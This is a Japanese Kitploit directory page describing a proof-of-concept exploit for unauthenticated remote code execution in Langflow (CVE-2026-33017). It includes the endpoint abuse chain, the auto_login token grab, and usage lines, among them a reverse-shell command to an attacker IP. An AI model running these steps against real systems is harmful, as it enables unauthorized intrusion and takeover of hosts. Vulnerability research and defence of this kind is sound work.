Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — Langflow 1.8.1 以前の脆弱性により、リモートの未認証攻撃者がホスト上で任意のコマンド実行を達成できる可能性があります。 | Kitploit
ツール/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

Langflow 1.8.1 以前の脆弱性により、リモートの未認証攻撃者がホスト上で任意のコマンド実行を達成できる可能性があります。

リポジトリを見る
15ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-33017-Langflow-RCE-PoC

Langflow 1.8.1 以前の脆弱性により、リモートの認証されていない攻撃者がホスト上で任意のコマンド実行を達成できます。

説明

POST /api/v1/build_public_tmp/{flow_id}/flow エンドポイントは、認証なしで誰でもパブリックフローを構築することを許可します。

任意の data パラメータを提供することで、攻撃者は保存されたフローを独自に作成した定義で上書きし、ノード設定内に任意の Python コードを埋め込むことができます。このユーザー制御のコードは、サンドボックス化や検証なしで exec() を介して実行され、認証されていないリモートコード実行につながります。

影響を受けるバージョン

root@kitploit:~
Langflow 1.8.1 以前

機能

  • AUTO_LOGIN=true の場合にパブリックフローを作成
  • エクスプロイト実行: 任意のコマンドを実行。
  • リバースシェル: bash ベースのリバースシェルを開始。

前提条件

  • 対象の Langflow インスタンスに少なくとも 1 つのパブリックフローがあること(デモ、チャットボット、共有ワークフローで一般的)
  • 1 つのパブリックフローの UUID(共有リンク/URL から取得可能)
  • 認証は不要

AUTO_LOGIN=true(デフォルト設定)の場合、認証されていない攻撃者はすべての条件を満たすことができます:

  • GET /api/v1/auto_login → スーパーユーザートークンを取得
  • POST /api/v1/flows/ → パブリックフローを作成
  • 認証なしで build_public_tmp を介してエクスプロイトをトリガー

使用方法

root@kitploit:~
python cve-2026-33017.py <host> [options]

オプション:

root@kitploit:~
-p PORT, --port PORT: SSH ポート(デフォルト: 7860)

-id FLOW_ID, --flow_id FLOW_ID: パブリックフロー ID(省略時は新しいものが作成されます)

-c COMMAND, --command COMMAND: 実行するカスタムコマンド

--shell: リバースシェルを起動

--lhost LHOST: リバースシェル用の攻撃者の IP

--lport LPORT: リバースシェル用の攻撃者のポート(デフォルト: 4444)

-t TIMEOUT, --timeout TIMEOUT: 接続タイムアウト(秒)(デフォルト: 5)

例:

コマンドを実行:

root@kitploit:~
python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'

リバースシェルを開始:

root@kitploit:~
python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

参照

GitHub Advisory

NVD CVE-2026-33017

Medium

⚠️ 免責事項

この PoC は教育および研究目的のみを対象としています。自己責任で使用してください。著者は、誤用または発生した損害について一切責任を負いません。

ツールをダウンロード